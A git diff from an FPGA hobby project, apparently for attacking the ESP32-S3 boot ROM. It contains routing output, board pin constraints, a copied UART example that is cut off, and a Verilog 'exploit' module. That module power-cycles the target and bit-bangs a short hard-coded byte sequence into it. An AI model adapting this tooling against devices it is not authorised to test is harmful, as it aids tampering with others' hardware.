"X2Y10/D2;X2Y10/D2/E260;1;X3Y10/C1;X3Y10/C1/X04;1;X2Y13/C2;X2Y13/C2/X04;1;X2Y10/C5;X2Y10/C5/N221;1;X4Y12/C1;X4Y12/C1/X04;1;X2Y10/E260;X2Y10/E260/VCC;1;X2Y10/D3;X2Y10/D3/E260;1;X0Y0/W260;X0Y0/W260/VCC;1;X0Y0/C4;X0Y0/C4/E261;1;X5Y10/S260;X5Y10/S260/VCC;1;X5Y10/D0;X5Y10/D0/S260;1;X3Y12/C1;X3Y12/C1/N220;1;X7Y11/X03;X7Y11/X03/VCC;1;X7Y11/D0;X7Y11/D0/X03;1;X7Y11/N220;X7Y11/N220/VCC;1;X7Y11/C0;X7Y11/C0/N220;1;X3Y10/C5;X3Y10/C5/W261;1;X3Y10/D1;X3Y10/D1/E270;1;X4Y13/C4;X4Y13/C4/X08;1;X6Y11/D5;X6Y11/D5/X04;1;X2Y14/D4;X2Y14/D4/X04;1;X6Y11/D2;X6Y11/D2/X03;1;X5Y13/C5;X5Y13/C5/X08;1;X4Y13/C1;X4Y13/C1/X04;1;X6Y11/C3;X6Y11/C3/X04;1;X1Y10/C4;X1Y10/C4/X08;1;X3Y12/N220;X3Y12/N220/VCC;1;X3Y12/C0;X3Y12/C0/N220;1;X2Y13/C1;X2Y13/C1/X04;1;X3Y12/C3;X3Y12/C3/W220;1;X2Y10/D5;X2Y10/D5/X04;1;X6Y11/C5;X6Y11/C5/X08;1;X4Y10/D0;X4Y10/D0/X03;1;X1Y10/D4;X1Y10/D4/X04;1;X6Y11/C0;X6Y11/C0/X04;1;X6Y11/C2;X6Y11/C2/X04;1;X1Y10/C1;X1Y10/C1/X04;1;X1Y10/A1;X1Y10/A1/X03;1;X6Y11/D4;X6Y11/D4/X04;1;X4Y10/C4;X4Y10/C4/E261;1;X1Y10/C3;X1Y10/C3/X04;1;X4Y12/C0;X4Y12/C0/X04;1;X5Y12/C1;X5Y12/C1/X04;1;X1Y12/C3;X1Y12/C3/X04;1;X2Y14/E270;X2Y14/E270/VCC;1;X2Y14/D1;X2Y14/D1/E270;1;X4Y12/C3;X4Y12/C3/X04;1;X2Y10/C1;X2Y10/C1/X04;1;X3Y12/C5;X3Y12/C5/S220;1;X2Y12/C4;X2Y12/C4/S220;1;X3Y13/C5;X3Y13/C5/S220;1;X6Y11/D1;X6Y11/D1/X03;1;X4Y13/C2;X4Y13/C2/X04;1;X2Y10/C0;X2Y10/C0/X04;1;X2Y14/C0;X2Y14/C0/X04;1;X4Y10/C5;X4Y10/C5/E261;1;X4Y13/C0;X4Y13/C0/X04;1;X2Y13/X07;X2Y13/X07/VCC;1;X2Y13/A4;X2Y13/A4/X07;1;X6Y11/X04;X6Y11/X04/VCC;1;X6Y11/C1;X6Y11/C1/X04;1;X3Y13/X03;X3Y13/X03/VCC;1;X3Y13/A0;X3Y13/A0/X03;1;X4Y12/C4;X4Y12/C4/X08;1;X3Y13/S220;X3Y13/S220/VCC;1;X3Y13/C4;X3Y13/C4/S220;1;X1Y10/X08;X1Y10/X08/VCC;1;X1Y10/C5;X1Y10/C5/X08;1;X2Y10/D4;X2Y10/D4/X04;1;X2Y14/D5;X2Y14/D5/X04;1;X1Y12/C0;X1Y12/C0/X04;1;X2Y13/C4;X2Y13/C4/X08;1;X4Y10/D5;X4Y10/D5/X04;1;X3Y13/C2;X3Y13/C2/X04;1;X5Y13/C3;X5Y13/C3/X04;1;X2Y14/D2;X2Y14/D2/E260;1;X3Y13/C1;X3Y13/C1/X04;1;X4Y10/D2;X4Y10/D2/X03;1;X2Y14/C3;X2Y14/C3/X04;1;X2Y14/C2;X2Y14/C2/X04;1;X4Y10/D1;X4Y10/D1/X03;1;X4Y10/W260;X4Y10/W260/VCC;1;X3Y10/C4;X3Y10/C4/W261;1;X5Y13/X08;X5Y13/X08/VCC;1;X5Y13/C4;X5Y13/C4/X08;1;X1Y10/D1;X1Y10/D1/X03;1;X2Y12/A1;X2Y12/A1/N200;1;X5Y12/X04;X5Y12/X04/VCC;1;X5Y12/C0;X5Y12/C0/X04;1;X1Y10/C2;X1Y10/C2/X04;1;X1Y12/X04;X1Y12/X04/VCC;1;X1Y12/C2;X1Y12/C2/X04;1;X2Y12/C1;X2Y12/C1/X04;1;X2Y10/D0;X2Y10/D0/E270;1;X1Y10/D2;X1Y10/D2/X03;1;X5Y13/C2;X5Y13/C2/X04;1;X3Y10/D4;X3Y10/D4/X04;1;X3Y10/D2;X3Y10/D2/E260;1;X6Y11/D3;X6Y11/D3/X08;1;X2Y12/N200;X2Y12/N200/VCC;1;X2Y12/A0;X2Y12/A0/N200;1;X4Y10/C2;X4Y10/C2/X04;1;X2Y12/C3;X2Y12/C3/X04;1;X5Y13/C1;X5Y13/C1/X04;1;X6Y11/X03;X6Y11/X03/VCC;1;X6Y11/A1;X6Y11/A1/X03;1;X3Y10/C2;X3Y10/C2/X04;1;X2Y10/C2;X2Y10/C2/X04;1;X2Y14/E260;X2Y14/E260/VCC;1;X2Y14/D3;X2Y14/D3/E260;1;X4Y12/X04;X4Y12/X04/VCC;1;X4Y12/C2;X4Y12/C2/X04;1;X3Y13/C3;X3Y13/C3/X04;1;X2Y12/C0;X2Y12/C0/X04;1;X1Y12/N220;X1Y12/N220/VCC;1;X1Y12/C1;X1Y12/C1/N220;1;X3Y10/E270;X3Y10/E270/VCC;1;X3Y10/D0;X3Y10/D0/E270;1;X2Y14/A1;X2Y14/A1/N200;1;X3Y10/C0;X3Y10/C0/X04;1;X4Y10/C3;X4Y10/C3/X04;1;X3Y10/E260;X3Y10/E260/VCC;1;X3Y10/D3;X3Y10/D3/E260;1;X5Y10/N220;X5Y10/N220/VCC;1;X5Y10/C0;X5Y10/C0/N220;1;X2Y10/E270;X2Y10/E270/VCC;1;X2Y10/D1;X2Y10/D1/E270;1;X2Y11/N220;X2Y11/N220/VCC;1;X2Y10/C4;X2Y10/C4/N221;1;X3Y12/C2;X3Y12/C2/W220;1;X0Y12/E270;X0Y12/E270/VCC;1;X1Y12/A3;X1Y12/A3/E271;1;X2Y13/X08;X2Y13/X08/VCC;1;X2Y13/C5;X2Y13/C5/X08;1;X5Y13/X04;X5Y13/X04/VCC;1;X5Y13/C0;X5Y13/C0/X04;1;X4Y10/C1;X4Y10/C1/X04;1;X3Y10/D5;X3Y10/D5/X04;1;X2Y14/X04;X2Y14/X04/VCC;1;X2Y14/C1;X2Y14/C1/X04;1;X4Y13/X08;X4Y13/X08/VCC;1;X4Y13/C5;X4Y13/C5/X08;1;X3Y13/X04;X3Y13/X04/VCC;1;X3Y13/C0;X3Y13/C0/X04;1;X3Y14/N220;X3Y14/N220/VCC;1;X3Y14/C0;X3Y14/C0/N220;1;X3Y10/X04;X3Y10/X04/VCC;1;X3Y10/C3;X3Y10/C3/X04;1;X4Y10/C0;X4Y10/C0/X04;1;X2Y12/S220;X2Y12/S220/VCC;1;X2Y12/C5;X2Y12/C5/S220;1;X4Y13/X04;X4Y13/X04/VCC;1;X4Y13/C3;X4Y13/C3/X04;1;X4Y10/X04;X4Y10/X04/VCC;1;X4Y10/D4;X4Y10/D4/X04;1;X1Y12/C5;X1Y12/C5/X08;1;X6Y11/X08;X6Y11/X08/VCC;1;X6Y11/C4;X6Y11/C4/X08;1;X3Y14/X03;X3Y14/X03/VCC;1;X3Y14/D0;X3Y14/D0/X03;1;X3Y12/W220;X3Y12/W220/VCC;1;X2Y14/N200;X2Y14/N200/VCC;1;X1Y10/X03;X1Y10/X03/VCC;1;X1Y10/D3;X1Y10/D3/X03;1;X2Y10/X04;X2Y10/X04/VCC;1;X2Y10/C3;X2Y10/C3/X04;1;X2Y14/C4;X2Y14/C4/S220;1;X4Y10/X03;X4Y10/X03/VCC;1;X4Y10/D3;X4Y10/D3/X03;1;X1Y10/C0;X1Y10/C0/X04;1;X2Y13/C0;X2Y13/C0/X04;1;X2Y13/X04;X2Y13/X04/VCC;1;X2Y13/C3;X2Y13/C3/X04;1;X4Y12/X08;X4Y12/X08/VCC;1;X4Y12/C5;X4Y12/C5/X08;1;X1Y12/X08;X1Y12/X08/VCC;1;X1Y12/C4;X1Y12/C4/X08;1;X3Y12/S220;X3Y12/S220/VCC;1;X3Y12/C4;X3Y12/C4/S220;1;X2Y14/S220;X2Y14/S220/VCC;1;X2Y14/C5;X2Y14/C5/S220;1;X1Y10/X04;X1Y10/X04/VCC;1;X1Y10/D5;X1Y10/D5/X04;1;X0Y0/VCC;;1;X2Y12/X04;X2Y12/X04/VCC;1;X2Y12/C2;X2Y12/C2/X04;1" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7438 ] , + "attributes": { + "ROUTING": "X6Y12/F1;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7437 ] , + "attributes": { + "ROUTING": "X6Y12/F0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:159.41-159.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "exploit_tx_count[2]": { + "hide_name": 0, + "bits": [ 7434 ] , + "attributes": { + "ROUTING": "X6Y12/D2;X6Y12/D2/E101;1;X5Y12/EW10;X5Y12/EW10/Q3;1;X6Y12/N210;X6Y12/N210/E111;1;X6Y11/B3;X6Y11/B3/N211;1;X6Y12/D3;X6Y12/D3/E101;1;X5Y12/E100;X5Y12/E100/Q3;1;X5Y12/Q3;;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:28.12-28.28" + } + }, + "exploit_tx_count[3]": { + "hide_name": 0, + "bits": [ 7433 ] , + "attributes": { + "ROUTING": "X6Y12/S100;X6Y12/S100/Q4;1;X6Y12/B0;X6Y12/B0/S100;1;X6Y12/E100;X6Y12/E100/Q4;1;X6Y12/C1;X6Y12/C1/E100;1;X6Y12/C2;X6Y12/C2/E130;1;X6Y12/E130;X6Y12/E130/Q4;1;X6Y12/C3;X6Y12/C3/E130;1;X6Y12/Q4;;1;X6Y12/N100;X6Y12/N100/Q4;1;X6Y11/B4;X6Y11/B4/N101;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:28.12-28.28" + } + }, + "exploit_tx_count[4]": { + "hide_name": 0, + "bits": [ 7432 ] , + "attributes": { + "ROUTING": "X6Y12/B1;X6Y12/B1/X04;1;X6Y12/B2;X6Y12/B2/X04;1;X6Y12/X04;X6Y12/X04/Q5;1;X6Y12/B3;X6Y12/B3/X04;1;X6Y12/Q5;;1;X6Y12/N250;X6Y12/N250/Q5;1;X6Y11/B5;X6Y11/B5/N251;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:28.12-28.28" + } + }, + "exploit_tx_count[5]": { + "hide_name": 0, + "bits": [ 7431 ] , + "attributes": { + "ROUTING": "X5Y11/E210;X5Y11/E210/Q1;1;X7Y11/B0;X7Y11/B0/E212;1;X6Y12/A0;X6Y12/A0/E251;1;X6Y12/A1;X6Y12/A1/E251;1;X6Y12/A2;X6Y12/A2/E251;1;X5Y11/Q1;;1;X5Y11/SN10;X5Y11/SN10/Q1;1;X5Y12/E250;X5Y12/E250/S111;1;X6Y12/A3;X6Y12/A3/E251;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:28.12-28.28" + } + }, + "exploit_tx_count[1]": { + "hide_name": 0, + "bits": [ 7429 ] , + "attributes": { + "ROUTING": "X5Y12/N130;X5Y12/N130/Q4;1;X5Y11/E230;X5Y11/E230/N131;1;X6Y11/B2;X6Y11/B2/E231;1;X6Y12/SEL0;X6Y12/SEL0/X07;1;X5Y12/Q4;;1;X6Y12/SEL2;X6Y12/SEL2/X07;1;X5Y12/E240;X5Y12/E240/Q4;1;X6Y12/X07;X6Y12/X07/E241;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:28.12-28.28" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I1": { + "hide_name": 0, + "bits": [ 7428 ] , + "attributes": { + "ROUTING": "X6Y12/F3;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.13-151.15" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0_MUX2_LUT5_O_I0": { + "hide_name": 0, + "bits": [ 7427 ] , + "attributes": { + "ROUTING": "X6Y12/F2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:158.41-158.66|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:151.9-151.11" + } + }, + "exploit_tx_count[0]": { + "hide_name": 0, + "bits": [ 7425 ] , + "attributes": { + "ROUTING": "X5Y12/X05;X5Y12/X05/Q2;1;X5Y12/A2;X5Y12/A2/X05;1;X5Y12/E220;X5Y12/E220/Q2;1;X6Y12/X01;X6Y12/X01/E221;1;X6Y12/SEL1;X6Y12/SEL1/X01;1;X5Y12/Q2;;1;X5Y12/E130;X5Y12/E130/Q2;1;X6Y12/N230;X6Y12/N230/E131;1;X6Y11/B1;X6Y11/B1/N231;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:28.12-28.28" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I1": { + "hide_name": 0, + "bits": [ 7424 ] , + "attributes": { + "ROUTING": "X6Y12/OF0;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.13-157.15" + } + }, + "bang_tx_reg_DFFE_Q_D_MUX2_LUT6_O_I0": { + "hide_name": 0, + "bits": [ 7423 ] , + "attributes": { + "ROUTING": "X6Y12/OF2;;1", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:157.9-157.11" + } + }, + "bang_tx_reg_DFFE_Q_D": { + "hide_name": 0, + "bits": [ 7420 ] , + "attributes": { + "ROUTING": "X6Y12/OF1;;1;X6Y12/W100;X6Y12/W100/OF1;1;X5Y12/C5;X5Y12/C5/W101;1;X5Y12/XD5;X5Y12/XD5/C5;1" + } + }, + "clk_in_IBUF_I_O": { + "hide_name": 0, + "bits": [ 7419 ] , + "attributes": { + "ROUTING": "X2Y14/CLK2;X2Y14/CLK2/S241;1;X4Y11/CLK2;X4Y11/CLK2/N242;1;X3Y10/CLK1;X3Y10/CLK1/N241;1;X5Y11/CLK0;X5Y11/CLK0/N242;1;X3Y14/CLK1;X3Y14/CLK1/W242;1;X6Y13/N240;X6Y13/N240/W101;1;X6Y12/CLK2;X6Y12/CLK2/N241;1;X4Y10/CLK1;X4Y10/CLK1/N241;1;X7Y13/W820;X7Y13/W820/W818;1;X0Y13/S240;X0Y13/S240/E828;1;X0Y14/E240;X0Y14/E240/S241;1;X1Y14/CLK1;X1Y14/CLK1/E241;1;X5Y12/CLK2;X5Y12/CLK2/N241;1;X1Y9/N240;X1Y9/N240/E828;1;X1Y8/CLK2;X1Y8/CLK2/N241;1;X3Y10/CLK0;X3Y10/CLK0/N241;1;X6Y13/W820;X6Y13/W820/W828;1;X1Y13/S240;X1Y13/S240/E828;1;X1Y14/CLK2;X1Y14/CLK2/S241;1;X7Y13/N240;X7Y13/N240/W828;1;X7Y12/W240;X7Y12/W240/N241;1;X5Y12/CLK1;X5Y12/CLK1/W242;1;X4Y11/CLK0;X4Y11/CLK0/N242;1;X7Y13/W270;X7Y13/W270/W828;1;X5Y13/W820;X5Y13/W820/W272;1;X2Y13/S240;X2Y13/S240/E828;1;X2Y14/CLK1;X2Y14/CLK1/S241;1;X2Y10/CLK2;X2Y10/CLK2/W241;1;X5Y13/S240;X5Y13/S240/W101;1;X5Y14/W240;X5Y14/W240/S241;1;X3Y14/CLK2;X3Y14/CLK2/W242;1;X4Y13/S240;X4Y13/S240/W242;1;X4Y14/CLK1;X4Y14/CLK1/S241;1;X2Y10/CLK1;X2Y10/CLK1/W241;1;X6Y13/W100;X6Y13/W100/W828;1;X5Y13/N240;X5Y13/N240/W101;1;X5Y11/N240;X5Y11/N240/N242;1;X5Y10/CLK1;X5Y10/CLK1/N241;1;X15Y13/W820;X15Y13/W820/W818;1;X7Y13/W100;X7Y13/W100/W828;1;X6Y13/W240;X6Y13/W240/W101;1;X4Y13/N240;X4Y13/N240/W242;1;X4Y11/CLK1;X4Y11/CLK1/N242;1;X1Y10/CLK2;X1Y10/CLK2/N241;1;X22Y13/W810;X22Y13/W810/W808;1;X14Y13/W820;X14Y13/W820/W818;1;X6Y13/N820;X6Y13/N820/W828;1;X6Y9/W820;X6Y9/W820/N824;1;X2Y9/N240;X2Y9/N240/W824;1;X2Y8/CLK2;X2Y8/CLK2/N241;1;X3Y10/W240;X3Y10/W240/N241;1;X2Y10/CLK0;X2Y10/CLK0/W241;1;X6Y13/W210;X6Y13/W210/W818;1;X4Y13/N210;X4Y13/N210/W212;1;X4Y11/N240;X4Y11/N240/N212;1;X4Y10/CLK2;X4Y10/CLK2/N241;1;X46Y13/E830;X46Y13/E830/F6;1;X39Y13/W800;X39Y13/W800/W838;1;X31Y13/W810;X31Y13/W810/W808;1;X23Y13/W810;X23Y13/W810/W818;1;X15Y13/W810;X15Y13/W810/W818;1;X7Y13/W810;X7Y13/W810/W818;1;X3Y13/N210;X3Y13/N210/W814;1;X3Y11/N240;X3Y11/N240/N212;1;X3Y10/CLK2;X3Y10/CLK2/N241;1;X46Y13/F6;;1;X46Y13/W830;X46Y13/W830/F6;1;X38Y13/W800;X38Y13/W800/W838;1;X30Y13/W800;X30Y13/W800/W808;1;X22Y13/W800;X22Y13/W800/W808;1;X14Y13/W810;X14Y13/W810/W808;1;X6Y13/W810;X6Y13/W810/W818;1;X1Y13/N210;X1Y13/N210/E818;1;X1Y11/N240;X1Y11/N240/N212;1;X1Y10/CLK1;X1Y10/CLK1/N241;1" + } + }, + "led_run_DFFSE_Q_D_LUT3_F_I0_LUT4_I1_F": { + "hide_name": 0, + "bits": [ 7418 ] , + "attributes": { + "ROUTING": "X5Y12/CE1;X5Y12/CE1/X08;1;X5Y12/CE2;X5Y12/CE2/X08;1;X5Y12/X08;X5Y12/X08/F7;1;X6Y12/CE2;X6Y12/CE2/E271;1;X5Y12/E270;X5Y12/E270/F7;1;X5Y12/F7;;1;X5Y12/N270;X5Y12/N270/F7;1;X5Y11/X06;X5Y11/X06/N271;1;X5Y11/CE0;X5Y11/CE0/X06;1" + } + }, + "bang_tx": { + "hide_name": 0, + "bits": [ 7407 ] , + "attributes": { + "ROUTING": " ", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:5.12-5.19" + } + }, + "bang_tx_reg[0]": { + "hide_name": 0, + "bits": [ 7415 ] , + "attributes": { + "ROUTING": "X5Y12/Q5;;1;X5Y12/E830;X5Y12/E830/Q5;1;X13Y12/E800;X13Y12/E800/E838;1;X21Y12/E810;X21Y12/E810/E808;1;X29Y12/E820;X29Y12/E820/E818;1;X37Y12/N820;X37Y12/N820/E828;1;X37Y4/N820;X37Y4/N820/N828;1;X37Y0/E240;X37Y0/E240/N824;1;X39Y0/E250;X39Y0/E250/E242;1;X41Y0/A0;X41Y0/A0/E252;1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:21.11-21.22" + } + } + } + } + } +} diff --git a/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/lushayproject.lushay.json b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/lushayproject.lushay.json new file mode 100644 index 0000000..bdd81c7 --- /dev/null +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/lushayproject.lushay.json @@ -0,0 +1,9 @@ +{ + "name": "ESP32-S3_Exploit_BitBang", + "board": "tangnano9k", + "includedFiles": ["ES32-S3_Exploit_BitBang.v"], + "constraintsFile": "tangnano9k.cst", + "baudRate": 115200, + "top":"exploit" + +} \ No newline at end of file diff --git a/ESP32-S3_Exploit/tangnano9k.cst b/ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/tangnano9k.cst similarity index 100% rename from ESP32-S3_Exploit/tangnano9k.cst rename to ESP32-S3_Exploit/ESP32-S3_Exploit_BitBang/tangnano9k.cst diff --git a/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/.core b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/.core new file mode 100644 index 0000000..3cb46e0 --- /dev/null +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/.core @@ -0,0 +1 @@ +{file_type:systemVerilogSource} \ No newline at end of file diff --git a/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/ES32-S3_Exploit_UART.v b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/ES32-S3_Exploit_UART.v new file mode 100644 index 0000000..374cd01 --- /dev/null +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/ES32-S3_Exploit_UART.v @@ -0,0 +1,75 @@ +module exploit +( + // exploit + input clk_in, + output bang_tx, + output power_tx, + output [5:0] led +); + +////////// EXPLOIT +localparam INSTRUCTION_OFFSET = 100; + +// da official exploit code +localparam EXPLOIT_BYTES = {16'hFA,16'hEB,16'h11,16'hDD}; + +localparam EXPLOIT_BYTES_LEN = $bits(EXPLOIT_BYTES)-1; // $bits() seems to work // https://www.linkedin.com/pulse/bits-clog2-size-uses-differences-muhammed-kawser-ahmed + +localparam LEDS_ON = 0; +localparam LEDS_OFF = 6'b111111; + +reg [1:0] bang_tx_reg = 0; +reg [1:0] power_tx_reg = 1; +reg [1:0] led_run = 1; +reg [1:0] rst = 0; +reg [1:0] running = 1; +reg [5:0] ledCounter = 0; +reg [23:0] instruction_counter = 0; +reg [23:0] exploit_tx_count = 0; +reg [EXPLOIT_BYTES_LEN:0] exploit_bytes_reg = EXPLOIT_BYTES; + +always @(posedge clk_in) begin + if(rst == 1) begin + running = 1; + power_tx_reg = 1; + rst = 0; + end + + if(instruction_counter == INSTRUCTION_OFFSET) begin + power_tx_reg = 0; + rst = 1; + end + + if(running == 1) begin + if(instruction_counter >= INSTRUCTION_OFFSET && instruction_counter <= INSTRUCTION_OFFSET+EXPLOIT_BYTES_LEN) begin + bang_tx_reg <= exploit_bytes_reg[exploit_tx_count]; + exploit_tx_count <= exploit_tx_count + 1; + led_run <= 1; + end else begin + led_run <= 0; + end + + if(led_run == 1) begin + ledCounter <= ledCounter + 1; + if(ledCounter == LEDS_OFF) begin + ledCounter <= LEDS_ON; + end + end + + if(instruction_counter == INSTRUCTION_OFFSET+EXPLOIT_BYTES_LEN) begin + ledCounter <= LEDS_ON; + rst = 1; + running = 0; + end + + instruction_counter <= instruction_counter + 1; + end +end + +assign led = ledCounter; +assign bang_tx = bang_tx_reg; +assign power_tx = power_tx_reg; + +endmodule + +`include "uart.v" \ No newline at end of file diff --git a/ESP32-S3_Exploit/lushayproject.lushay.json b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/lushayproject.lushay.json similarity index 57% rename from ESP32-S3_Exploit/lushayproject.lushay.json rename to ESP32-S3_Exploit/ESP32-S3_Exploit_UART/lushayproject.lushay.json index cbecce8..201fd98 100644 --- a/ESP32-S3_Exploit/lushayproject.lushay.json +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/lushayproject.lushay.json @@ -1,7 +1,7 @@ { - "name": "ESP32-S3_Exploit", + "name": "ESP32-S3_Exploit_UART", "board": "tangnano9k", - "includedFiles": ["ES32-S3_Exploit.v"], + "includedFiles": ["ES32-S3_Exploit_UART.v"], "constraintsFile": "tangnano9k.cst", "baudRate": 115200, "top":"exploit" diff --git a/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/tangnano9k.cst b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/tangnano9k.cst new file mode 100644 index 0000000..525c261 --- /dev/null +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/tangnano9k.cst @@ -0,0 +1,27 @@ +IO_LOC "uart_rx" 18; +IO_PORT "uart_rx" IO_TYPE=LVCMOS33; + +IO_LOC "uart_tx" 17; +IO_PORT "uart_tx" IO_TYPE=LVCMOS33; + +IO_LOC "btn1" 3; + +IO_LOC "bang_tx" 69; + +IO_LOC "power_tx" 57; +IO_PORT "power_tx" DRIVE=24; + +IO_LOC "clk_in" 56; +IO_PORT "clk_in" PULL_MODE=UP; + +IO_LOC "led[0]" 10; + +IO_LOC "led[1]" 11; + +IO_LOC "led[2]" 13; + +IO_LOC "led[3]" 14; + +IO_LOC "led[4]" 15; + +IO_LOC "led[5]" 16; diff --git a/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/uart.v b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/uart.v new file mode 100644 index 0000000..1b4944c --- /dev/null +++ b/ESP32-S3_Exploit/ESP32-S3_Exploit_UART/uart.v @@ -0,0 +1,170 @@ +`default_nettype none + +// ganked from https://raw.githubusercontent.com/lushaylabs/tangnano9k-series-examples/ +// of https://learn.lushaylabs.com +module uart +#( + parameter DELAY_FRAMES = 234 // 27,000,000 (27Mhz) / 115200 Baud rate +) +( + input clk, + input uart_rx, + output uart_tx, + output reg [5:0] led, + input btn1 +); + +localparam HALF_DELAY_WAIT = (DELAY_FRAMES / 2); + +reg [3:0] rxState = 0; +reg [12:0] rxCounter = 0; +reg [7:0] dataIn = 0; +reg [2:0] rxBitNumber = 0; +reg byteReady = 0; + +localparam RX_STATE_IDLE = 0; +localparam RX_STATE_START_BIT = 1; +localparam RX_STATE_READ_WAIT = 2; +localparam RX_STATE_READ = 3; +localparam RX_STATE_STOP_BIT = 5; + +always @(posedge clk) begin + case (rxState) + RX_STATE_IDLE: begin + if (uart_rx == 0) begin + rxState <= RX_STATE_START_BIT; + rxCounter <= 1; + rxBitNumber <= 0; + byteReady <= 0; + end + end + RX_STATE_START_BIT: begin + if (rxCounter == HALF_DELAY_WAIT) begin + rxState <= RX_STATE_READ_WAIT; + rxCounter <= 1; + end else + rxCounter <= rxCounter + 1; + end + RX_STATE_READ_WAIT: begin + rxCounter <= rxCounter + 1; + if ((rxCounter + 1) == DELAY_FRAMES) begin + rxState <= RX_STATE_READ; + end + end + RX_STATE_READ: begin + rxCounter <= 1; + dataIn <= {uart_rx, dataIn[7:1]}; + rxBitNumber <= rxBitNumber + 1; + if (rxBitNumber == 3'b111) + rxState <= RX_STATE_STOP_BIT; + else + rxState <= RX_STATE_READ_WAIT; + end + RX_STATE_STOP_BIT: begin + rxCounter <= rxCounter + 1; + if ((rxCounter + 1) == DELAY_FRAMES) begin + rxState <= RX_STATE_IDLE; + rxCounter <= 0; + byteReady <= 1; + end + end + endcase +end + +always @(posedge clk) begin + if (byteReady) begin + led <= ~dataIn[5:0]; + end +end + +reg [3:0] txState = 0; +reg [24:0] txCounter = 0; +reg [7:0] dataOut = 0; +reg txPinRegister = 1; +reg [2:0] txBitNumber = 0; +reg [3:0] txByteCounter = 0; + +assign uart_tx = txPinRegister; + +localparam MEMORY_LENGTH = 12; +reg [7:0] testMemory [MEMORY_LENGTH-1:0]; + +initial begin + testMemory[0] = "L"; + testMemory[1] = "u"; + testMemory[2] = "s"; + testMemory[3] = "h"; + testMemory[4] = "a"; + testMemory[5] = "y"; + testMemory[6] = " "; + testMemory[7] = "L"; + testMemory[8] = "a"; + testMemory[9] = "b"; + testMemory[10] = "s"; + testMemory[11] = " "; +end + +localparam TX_STATE_IDLE = 0; +localparam TX_STATE_START_BIT = 1; +localparam TX_STATE_WRITE = 2; +localparam TX_STATE_STOP_BIT = 3; +localparam TX_STATE_DEBOUNCE = 4; + +always @(posedge clk) begin + case (txState) + TX_STATE_IDLE: begin + if (btn1 == 0) begin + txState <= TX_STATE_START_BIT; + txCounter <= 0; + txByteCounter <= 0; + end + else begin + txPinRegister <= 1; + end + end + TX_STATE_START_BIT: begin + txPinRegister <= 0; + if ((txCounter + 1) == DELAY_FRAMES) begin + txState <= TX_STATE_WRITE; + dataOut <= testMemory[txByteCounter]; + txBitNumber <= 0; + txCounter <= 0; + end else + txCounter <= txCounter + 1; + end + TX_STATE_WRITE: begin + txPinRegister <= dataOut[txBitNumber]; + if ((txCounter + 1) == DELAY_FRAMES) begin + if (txBitNumber == 3'b111) begin + txState <= TX_STATE_STOP_BIT; + end else begin + txState <= TX_STATE_WRITE; + txBitNumber <= txBitNumber + 1; + end + txCounter <= 0; + end else + txCounter <= txCounter + 1; + end + TX_STATE_STOP_BIT: begin + 